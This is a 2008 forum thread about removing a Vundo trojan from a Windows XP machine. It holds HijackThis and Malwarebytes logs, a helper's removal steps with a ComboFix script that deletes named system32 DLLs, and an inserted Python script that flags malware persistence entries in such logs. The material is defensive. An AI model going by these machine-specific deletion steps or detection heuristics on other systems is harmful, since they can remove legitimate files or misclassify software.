O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2006\WinStylerThemeSvc.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 13068 bytes

Edited by a_fahmy7, 16 June 2008 - 03:33 PM.


#5 TheJoker

    Forum Deity

  • Boot Camp Mod
  • 14,352 posts

Posted 16 June 2008 - 10:27 PM

Should I really delete the saved passwords in firefox private data as well or can I keep those.

You can keep that if you choose to do so. :)
You can either choose to not clear Private Data, or you can click the Settings button to configure what data is cleared.

There are now a few more items that need to be deleted, so please use these instructions.

You are running Paltalk, which is adware and I recommend uninstalling it. If you choose to uninstall it, go to Start > Control Panel > Add or Remove Programs and remove the following program, if found:
PalTalk

Then, using Windows Explorer, delete the program folder at:
C:\Program Files\Paltalk Messenger

IMVU 3D messenger has been known to cause problems and, unless it is something you really want to keep, I recommend optionally removing it using the Control Panel's Add or Remove Programs.

I see you have Viewpoint installed...
Viewpoint Manager is considered to be foistware instead of malware since it is installed without users' approval, but doesn't spy or do anything "bad". This will change though, please read this article:
http://www.clickz.co...cle.php/3561546
I suggest you remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present:
  • Viewpoint
  • Viewpoint Manager
  • Viewpoint Media Player
Reboot afterwards. <-- Important!

If you choose to uninstall Viewpoint, after rebooting, using Windows Explorer delete the following folder if still there:
C:\Program Files\Viewpoint

Clean your Cache and Cookies in IE:
  • Close all instances of Outlook Express and Internet Explorer
  • Go to Control Panel > Internet Options > General tab
  • Click the "Delete Cookies" button
  • Next to it, Click the "Delete Files" button
  • When prompted, place a check in: "Delete all offline content", click OK
Clean your Cache and Cookies in Firefox (In case you also have Firefox installed):
  • Go to Tools > Options.
  • Click Privacy in the menu on the left side of the Options window.
  • Click the Clear button located to the right of each option (History, Cookies, Private Data).
    You can either choose not to clear Private Data, or you can click the Settings button to configure what data is cleared.
  • Click OK to close the Options window
    Alternatively, you can clear all information stored while browsing by clicking Clear All.
    A confirmation dialog box will be shown before clearing the information.
Clean other Temporary files + Recycle bin
  • Go to start > run and type: cleanmgr and click ok.
  • Let it scan your system for files to remove.
  • Make sure Temporary Files, Temporary Internet Files, and Recycle Bin are the only things checked.
  • Press OK to remove them.
Please download Malwarebytes' Anti-Malware from Here or Here

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish, so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Note)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy & Paste the entire report in your next reply along with a fresh HijackThis log.
Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


Now you need to run HijackThis and click "Do a system scan only." Place a check next to the following entries (if they are still there):

O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: (no name) - {62F940A5-9D03-4F01-A0D0-FE1308201AE7} - C:\WINDOWS\system32\qoMdabXo.dll (file missing)
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [cc97e1b9] rundll32.exe "C:\WINDOWS\system32\ccrrhydm.dll",b
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\epwhgnjp.dll",s
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll


If you uninstalled PalTalk as recommended, also check (if still there):
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)

If you uninstalled IMVU 3D as recommended, also check (if still there):
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk

Now close all browser and other windows except for HijackThis, and click "Fix Checked" to have HijackThis fix the entries you checked.

Download ComboFix© by sUBs from one of these links:
http://download.blee...Bs/ComboFix.exe
http://www.forospywa...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Save the file to your Desktop.

Familiarize yourself with ComboFix before running it:
http://www.bleepingc...to-use-combofix
This includes installing the Windows XP Recovery Console in case you have not installed it yet.

Disconnect from the Internet (pull the connection cable) <-- Important
Close your ESET NOD32 antivirus and any anti-spyware applications you may be running.

For this next step, please ensure that ComboFix.exe is on your desktop:

Please open Notepad *Do Not Use Wordpad!* (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
Save this as "CFScript.txt" and change the "Save as type" to "All Files" and place it on your desktop.

File::
C:\WINDOWS\system32\iifcARIx.dll
C:\WINDOWS\system32\qoMdabXo.dll
C:\WINDOWS\system32\ljJCSkjg.dll
C:\WINDOWS\system32\gfvwynfe.dll
C:\WINDOWS\system32\ccrrhydm.dll
C:\WINDOWS\system32\epwhgnjp.dll

[Screenshot: dragging CFScript.txt onto ComboFix.exe]

Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
When finished, it shall produce a log for you, C:\ComboFix.txt. Post that log in your next reply.
CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

After the system restarts, your ESET NOD32 AntiVirus should be running again.
If it isn't, restart it manually.
Reconnect to the Internet.

Please post a new HijackThis log, the log from MBAM, and in a second reply (due to length) the log from ComboFix (combofix.txt), and note any errors encountered.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-2010 and ASAP Member since 2005
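
The HijackThis entries TheJoker asks to fix above share a recognisable shape: a BHO registered with no display name, a Run value with a random hex name that uses rundll32 to load a DLL through a single-letter export, and a Winlogon Notify package pointing at the same DLL as one of the BHOs. The following Python script is an added example for this page, not part of the thread, of HijackThis or of any tool named here; it applies those heuristics to the O2/O4/O20 lines quoted above (plus two benign entries taken from the log posted later in the thread) and reports only entries that carry at least one strong signal. Treating the 8-letter DLL-name test as a weak, supporting signal is the editor's assumption, because legitimate system32 DLLs with such names exist; an orphaned "(file missing)" BHO is likewise reported as a leftover to remove rather than as proof of infection.

```python
"""Triage HijackThis log entries for Virtumonde/Vundo-style load points.

Added example by the editor; it is not part of the forum thread, of
HijackThis or of any tool named there. The sample lines are the O2/O4/O20
entries quoted in the thread plus two benign entries from the same logs;
the heuristics are the editor's reading of those entries, not a HijackThis
feature.
"""
import re
from collections import defaultdict

# Line shapes handled: O2 = Browser Helper Object, O4 = Run key, O20 = Winlogon Notify.
O2_RE = re.compile(r"^O2 - BHO: (?P<name>.+?) - (?P<clsid>\{[0-9A-Fa-f-]{36}\}) - (?P<target>.+)$")
O4_RE = re.compile(r"^O4 - (?P<hive>HK\w+)\\\.\.\\Run: \[(?P<value>[^\]]+)\] (?P<cmd>.+)$")
O20_RE = re.compile(r"^O20 - Winlogon Notify: (?P<key>\S+) - (?P<target>.+)$")

# Vundo dropped DLLs straight into system32 under 8-letter pseudo-random
# names (iifcARIx.dll, ccrrhydm.dll). Legitimate 8-letter names exist there
# too (wintrust.dll, browseui.dll), so this is only a *weak*, supporting signal.
RANDOM_DLL_RE = re.compile(r"\\system32\\[A-Za-z]{8}\.dll$", re.IGNORECASE)
# Vundo's Run values: rundll32 "<system32 dll>",<single-letter export name>
RUNDLL_RE = re.compile(r'^rundll32\.exe\s+"(?P<dll>[^"]+)",(?P<export>[A-Za-z])$', re.IGNORECASE)
# Run value names like cc97e1b9 / BMcfa4d225: a random hex token, not a product name
HEX_VALUE_RE = re.compile(r"^(BM)?[0-9a-f]{8}$")


def triage(lines):
    """Return {line: {"strong": [...], "weak": [...]}} for every entry with at least
    one strong signal. Weak signals alone are never enough to report a line."""
    signals = defaultdict(lambda: {"strong": [], "weak": []})
    bho_by_dll = {}      # lower-cased DLL path -> O2 line (for O2/O20 correlation)
    notify_hooks = []    # (O20 line, lower-cased DLL path)
    for raw in lines:
        line = raw.strip()
        if m := O2_RE.match(line):
            target = m["target"]
            missing = target == "(no file)" or target.endswith("(file missing)")
            if m["name"] == "(no name)":
                signals[line]["strong"].append("BHO registered without a display name")
            if missing:
                # A CLSID whose DLL is gone is a leftover to remove, not proof of infection.
                signals[line]["strong"].append("orphaned BHO: CLSID registered but DLL is gone")
            path = target.replace(" (file missing)", "")
            if RANDOM_DLL_RE.search(path):
                signals[line]["weak"].append("8-letter random-looking DLL name in system32")
            bho_by_dll[path.lower()] = line
        elif m := O4_RE.match(line):
            cmd = RUNDLL_RE.match(m["cmd"])
            if cmd:
                signals[line]["strong"].append(
                    f"rundll32 loads {cmd['dll']} via single-letter export '{cmd['export']}'")
                if RANDOM_DLL_RE.search(cmd["dll"]):
                    signals[line]["weak"].append("8-letter random-looking DLL name in system32")
            if HEX_VALUE_RE.match(m["value"]):
                signals[line]["strong"].append("Run value named with a random hex token")
        elif m := O20_RE.match(line):
            if RANDOM_DLL_RE.search(m["target"]):
                signals[line]["weak"].append("8-letter random-looking DLL name in system32")
            notify_hooks.append((line, m["target"].lower()))
    # The classic Vundo pair: one DLL hooked both as a BHO (runs inside IE) and
    # as a Winlogon Notify package (loaded into winlogon.exe at every logon),
    # so the DLL is already running before any user-mode scanner starts.
    for line, path in notify_hooks:
        if path in bho_by_dll:
            signals[line]["strong"].append("same DLL is also registered as a BHO (O2/O20 pair)")
            signals[bho_by_dll[path]]["strong"].append(
                "same DLL is also a Winlogon Notify package (O2/O20 pair)")
    return {line: s for line, s in signals.items() if s["strong"]}


# Sample input: entries quoted in the thread (the Vundo lines plus two benign ones).
SAMPLE_LOG = r"""
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: (no name) - {62F940A5-9D03-4F01-A0D0-FE1308201AE7} - C:\WINDOWS\system32\qoMdabXo.dll (file missing)
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [cc97e1b9] rundll32.exe "C:\WINDOWS\system32\ccrrhydm.dll",b
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\epwhgnjp.dll",s
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll
""".strip().splitlines()

if __name__ == "__main__":
    for entry, found in triage(SAMPLE_LOG).items():
        print(entry)
        for reason in found["strong"]:
            print("   [strong]", reason)
        for reason in found["weak"]:
            print("   [weak]  ", reason)
```

Running it prints each flagged entry with its reasons; the Adobe BHO and the nod32kui Run value produce nothing, and a real 8-letter Notify package such as WgaLogon.dll would only register a weak signal and stay unreported. The O2/O20 pairing is the check worth keeping in mind when reading these logs by hand: a Notify package is loaded into winlogon.exe at logon, so deleting the on-disk DLL while it is still mapped there tends not to stick, which is why the procedure above removes the registry entries and then follows with ComboFix and a reboot.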


#6 a_fahmy7, Advanced Member (Full Member, 109 posts)

Posted 17 June 2008 - 10:02 AM

No errors encountered :)

Malwarebytes' Anti-Malware Report

Malwarebytes' Anti-Malware 1.17
Database version: 863

4:43:37 PM 6/17/2008
mbam-log-6-17-2008 (16-43-37).txt

Scan type: Quick Scan
Objects scanned: 43656
Time elapsed: 6 minute(s), 1 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 1
Registry Keys Infected: 7
Registry Values Infected: 3
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 12

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
C:\WINDOWS\system32\iifcARIx.dll (Trojan.Vundo) -> Unloaded module successfully.

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{129fa2a1-408c-4824-83a4-5001581fd01e} (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{129fa2a1-408c-4824-83a4-5001581fd01e} (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\iifcarix (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\aoprndtws (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\Software\Microsoft\rdfa (Trojan.Vundo) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\FCOVM (Trojan.Vundo) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemoveRP (Trojan.Vundo) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{129fa2a1-408c-4824-83a4-5001581fd01e} (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc97e1b9 (Trojan.Vundo) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BMcfa4d225 (Trojan.Agent) -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\pcmmdprx.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\xrpdmmcp.ini (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\iifcARIx.dll (Trojan.Vundo) -> Delete on reboot.
C:\WINDOWS\system32\byXqnKcb.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\cbXQkjhe.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\ddcYsRLE.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\opnKDtrs.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\tuvWmmKd.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\wvUOGVPj.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\mlJCUNeC.dll (Trojan.Vundo) -> Delete on reboot.
C:\WINDOWS\system32\clkcnt.txt (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\khfFYRkJ.dll (Trojan.Vundo) -> Delete on reboot.

#7 a_fahmy7, Advanced Member (Full Member, 109 posts)

Posted 17 June 2008 - 10:03 AM

HijackThis log file:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:03:14 PM, on 6/17/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - (no file)
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: Digital Line Detect.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
